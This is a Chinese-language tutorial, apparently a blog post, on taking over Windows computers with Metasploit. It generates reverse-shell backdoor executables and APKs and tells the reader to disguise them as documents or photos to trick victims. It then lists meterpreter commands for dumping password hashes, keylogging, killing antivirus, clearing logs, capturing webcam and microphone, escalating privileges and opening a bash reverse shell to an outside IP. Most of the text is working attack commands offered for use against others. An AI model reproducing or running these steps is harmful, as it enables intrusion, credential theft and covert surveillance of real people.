MSF Exploit入侵电脑实践(Win7/Win10皆可)
msf exploit入侵电脑(Win7/Win10皆可)
需要的工具:msfvenom . msfconsole (kali里面有)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exemsfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=6666 -f exe -o xss.exe
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=8888 R> test.apk
即生成一个后门文件xss.exe
然后继续执行命令:
msfconsole
(运行msfconsole)
msf>use exploit/multi/handler (选择模块)
输入命令show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp。
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set lhost 加ip地址
set lport 加端口号
msf exploit(handler) > exploit -z -j (后台执行)
这样木马就配置好了,然后发给别人(可以伪造成文档,照片,软件等文件骗取别人打开)
发给别人后,等待别人打开xss.exe,打开即上钩了
msf exploit(handler) > sessions(查看上钩的用户)
msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)
进入meterpreter了,即可进行一些相关的木马操作。
background:这个命令是将当前的session放到后台运行,可以在msf中继续其他渗透任务;
sessions:这个命令需要配合上面的background使用,该命令是将后台的会话打开,进行会话操作。
clearev:该命令是用来清除渗透的登录信息的,这个很有用。
hashdump:该命令是一个post模块,需要配合meterpreter使用,这个命令是用来获取目标系统的哈希值的meterpreter > run post/windows/gather/hashdump
migrate:这个也是一个post模块。可以将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀软。meterpreter > run post/windows/manage/migrate
webcam_list:列举摄像头。
webcam_snap:通过远程连接目标系统的摄像头。
run killav:关闭对方的杀软,其实关闭杀软也可以进入cmd中手动关闭。
meterpreter
meterpreter是更高级的payload。
纯内存工作模式(不写硬盘),避免被电子取证;加密的通信协议,对传输过程进行加密;易于扩展。
基本命令
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.80.148
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.80.163
msf exploit(ms08_067_netapi) > exploit -j
msf exploit(ms08_067_netapi) > sessions -i 1 进入meterpreter类型的shell
meterpreter > background 退出到msf命令提示符下
meterpreter > lpwd 等价于在kali上输入pwd
meterpreter > lcd /etc 等价于在kali上输入cd /etc
meterpreter > run post/windows/gather/smart_hashdump 获取目标主机上用户的hash值
meterpreter > run post/windows/capture/keylog_recorder 键盘记录
meterpreter > run killav 结束目标主机上的杀毒软件相关进程
meterpreter > clearev 清除系统日志
meterpreter > download boot.ini 下载目标主机上的boot.ini文件
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 上传nc.exe到目标主机上。(注意要使用2个反斜杠)
meterpreter > dir windows\\system32\\nc.exe
meterpreter > execute -f nc -nvlp 3333 执行nc.exe
meterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"
meterpreter > execute -f bash -i -H
meterpreter > execute -f cmd.exe -i -H 获得目标主机的shell,-i交互模式,-H隐藏
meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"
meterpreter > cat foo.txt
-m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。
meterpreter > getuid 查看当前用户
meterpreter > getsystem 提权到system用户
meterpreter > getprivs 查看当前用户具有的权限
meterpreter > getpid 查看meterpreter注入到了什么进程中
meterpreter > migrate 1436 更改到pid1436进程中
meterpreter > getpid 重新使用getpid命令查看
meterpreter > hashdump 获取目标主机上用户的hash值
meterpreter > sysinfo 查看目标系统的信息
meterpreter > kill 188 结束188进程
meterpreter > shell 获取目标操作系统的shell
meterpreter > idletime 查看目标主机已经空闲了多长时间
meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts 编辑hosts文件
meterpreter > record_mic -d 10 -f /root/桌面/1.mp4 监听麦克风
meterpreter > load python 加载python插件